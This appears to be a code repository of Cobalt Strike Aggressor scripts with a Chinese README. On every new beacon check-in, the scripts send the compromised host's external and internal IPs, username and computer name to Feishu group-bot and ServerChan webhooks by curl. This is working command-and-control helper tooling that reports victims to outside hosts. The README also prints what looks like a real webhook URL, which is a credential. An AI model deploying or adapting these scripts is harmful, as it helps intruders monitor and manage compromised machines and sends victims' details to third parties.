├── README.md
├── http_feishu.cna
├── http_feishu_wechat.cna
└── http_wechatServerChains.cna
/README.md:
--------------------------------------------------------------------------------
1 | # Cobalt_Strike_Bot
2 | CobaltStrike 上线通知,飞书群聊机器人通知
3 |
4 | ## 飞书群聊机器人
5 | 在飞书中新建一个群聊,在群聊中添加一个群聊机器人。复制其webhook地址,并用它替换脚本中`$feishu_url`的值。webhook地址本身即是机器人的凭据,请勿将真实地址提交到公开仓库。
6 | ```bash
7 | $feishu_url = 'https://open.feishu.cn/open-apis/bot/v2/hook/092e2219-726f-4202-876a-cc6ac8641490';
8 | ```
9 |
10 |
11 |
12 |
13 |
14 | ## 服务端部署
15 |
16 | 此脚本依赖`curl`命令,请确保cs服务端已安装了`curl`
17 | ```bash
18 | ./agscript [IP] [PORT] [UserName] [PassWord] [cna_file_Path]
19 | ```
20 | ## 效果图
21 |
22 | 

23 |
24 |
25 |
--------------------------------------------------------------------------------
/http_feishu.cna:
--------------------------------------------------------------------------------
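# Make a value safe to embed inside a JSON string literal: control
# characters become "_", then backslashes and double quotes are escaped.
sub feishu_json_escape {
	local('$clean');
	$clean = replace($1, '[\x00-\x1f]', "_");
	return strrep(strrep($clean, "\\", "\\\\"), "\"", "\\\"");
}

# Posts a text message to a Feishu group bot when a new beacon checks in.
# $1 is the beacon id passed to the beacon_initial event.
on beacon_initial {
	# Feishu group-bot webhook URL. The URL itself is the bot's credential:
	# anyone who has it can post to the group. Keep the real value out of
	# version control; a webhook URL that has been committed should be
	# regenerated in Feishu.
	$feishu_url = '把这里替换为飞书webhook的地址';

	# IPs, login account and computer name as reported by the beacon.
	# These strings come from the remote host, so they are treated as
	# untrusted and escaped before being placed in the JSON body.
	# Spaces are replaced with "_" as before.
	$externalIP = feishu_json_escape(replace(beacon_info($1, "external"), " ", "_"));
	$internalIP = feishu_json_escape(replace(beacon_info($1, "internal"), " ", "_"));
	$userName = feishu_json_escape(replace(beacon_info($1, "user"), " ", "_"));
	$computerName = feishu_json_escape(replace(beacon_info($1, "computer"), " ", "_"));

	# JSON message body. The \n sequences sit in single-quoted strings, so
	# they reach Feishu as JSON newline escapes rather than raw newlines.
	$text = 'Cobalt Strike上线提醒\nexternal: ' . $externalIP . '\ninternal: ' . $internalIP . '\n用户名: ' . $userName . '\n计算机名: ' . $computerName . '\n';
	$msg = '{"msg_type":"text","content":{"text": "' . $text . '"}}';

	# Call the Feishu API. The arguments are passed as an array, not as one
	# command string. NOTE(review): the webhook URL is visible in the team
	# server's process list while curl runs.
	@curl_command = @('curl', '-X', 'POST', '-H', 'Content-Type: application/json', '-d', $msg, $feishu_url);
	exec(@curl_command);
}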
--------------------------------------------------------------------------------
/http_feishu_wechat.cna:
--------------------------------------------------------------------------------
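# Make a value safe to embed inside a JSON string literal: control
# characters become "_", then backslashes and double quotes are escaped.
sub feishu_json_escape {
	local('$clean');
	$clean = replace($1, '[\x00-\x1f]', "_");
	return strrep(strrep($clean, "\\", "\\\\"), "\"", "\\\"");
}

# Sends a check-in notification to both a Feishu group bot and ServerChan
# (server酱) when a new beacon checks in. $1 is the beacon id passed to the
# beacon_initial event.
on beacon_initial {
	# Feishu group-bot webhook URL (placeholder; replace before use).
	$feishu_url = '把这里替换为飞书webhook的地址';
	# ServerChan API URL (placeholder; the SendKey goes into the path).
	# Both URLs act as credentials, so keep the real values out of version
	# control.
	$serverchains_api = 'https://sctapi.ftqq.com/把这里替换为server酱的SendKey.send';

	# IPs, login account and computer name as reported by the beacon.
	# These strings come from the remote host and are treated as untrusted.
	# Spaces are replaced with "_" as before.
	$externalIP = replace(beacon_info($1, "external"), " ", "_");
	$internalIP = replace(beacon_info($1, "internal"), " ", "_");
	$userName = replace(beacon_info($1, "user"), " ", "_");
	$computerName = replace(beacon_info($1, "computer"), " ", "_");

	# Feishu: escape each field so a quote or backslash in it cannot break
	# out of the JSON string. The \n sequences sit in single-quoted strings
	# and reach Feishu as JSON newline escapes.
	$text = 'Cobalt Strike上线提醒\n出口IP: ' . feishu_json_escape($externalIP) . '\n内网IP: ' . feishu_json_escape($internalIP) . '\n用户名: ' . feishu_json_escape($userName) . '\n计算机名: ' . feishu_json_escape($computerName) . '\n';
	$msg = '{"msg_type":"text","content":{"text": "' . $text . '"}}';
	# Call the Feishu API through curl (argument array, no command string).
	@curl_command = @('curl', '-X', 'POST', '-H', 'Content-Type: application/json', '-d', $msg, $feishu_url);
	exec(@curl_command);

	# ServerChan: the body is form-encoded. --data-urlencode makes curl
	# percent-encode each value, so "&", "%" or "+" in a field can no longer
	# add or alter form parameters. The blank lines are written as real
	# CRLF pairs, which curl encodes to the %0d%0a sequences sent before.
	$desp = "\r\n\r\n" . '出口IP: ' . $externalIP . "\r\n\r\n" . '内网IP: ' . $internalIP . "\r\n\r\n" . '用户名: ' . $userName . "\r\n\r\n" . '计算机名: ' . $computerName;
	# Call the ServerChan API through curl.
	# NOTE(review): the SendKey in the URL is visible in the team server's
	# process list while curl runs.
	@curl_command_wechat = @('curl', '-X', 'POST', '--data-urlencode', 'title=Cobalt Strike上线通知', '--data-urlencode', 'desp=' . $desp, $serverchains_api);
	exec(@curl_command_wechat);
}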
28 |
--------------------------------------------------------------------------------
/http_wechatServerChains.cna:
--------------------------------------------------------------------------------
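# Sends a check-in notification to ServerChan (server酱) when a new beacon
# checks in. $1 is the beacon id passed to the beacon_initial event.
on beacon_initial {
	# ServerChan API URL (placeholder; the SendKey goes into the path).
	# The SendKey is a credential, so keep the real value out of version
	# control.
	$serverchains_api = 'https://sctapi.ftqq.com/在这里替换server酱的SendKey.send';

	# IPs, login account and computer name as reported by the beacon.
	# These strings come from the remote host and are treated as untrusted.
	# Spaces are replaced with "_" as before.
	$externalIP = replace(beacon_info($1, "external"), " ", "_");
	$internalIP = replace(beacon_info($1, "internal"), " ", "_");
	$userName = replace(beacon_info($1, "user"), " ", "_");
	$computerName = replace(beacon_info($1, "computer"), " ", "_");

	# The body is form-encoded. --data-urlencode makes curl percent-encode
	# each value, so "&", "%" or "+" in a field can no longer add or alter
	# form parameters. The blank lines are written as real CRLF pairs, which
	# curl encodes to the %0d%0a sequences sent before.
	$desp = "\r\n\r\n" . '出口IP: ' . $externalIP . "\r\n\r\n" . '内网IP: ' . $internalIP . "\r\n\r\n" . '用户名: ' . $userName . "\r\n\r\n" . '计算机名: ' . $computerName;

	# Call the ServerChan API through curl (argument array, no command
	# string). NOTE(review): the SendKey in the URL is visible in the team
	# server's process list while curl runs.
	@curl_command_wechat = @('curl', '-X', 'POST', '--data-urlencode', 'title=Cobalt Strike上线通知', '--data-urlencode', 'desp=' . $desp, $serverchains_api);
	exec(@curl_command_wechat);
}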
17 |
--------------------------------------------------------------------------------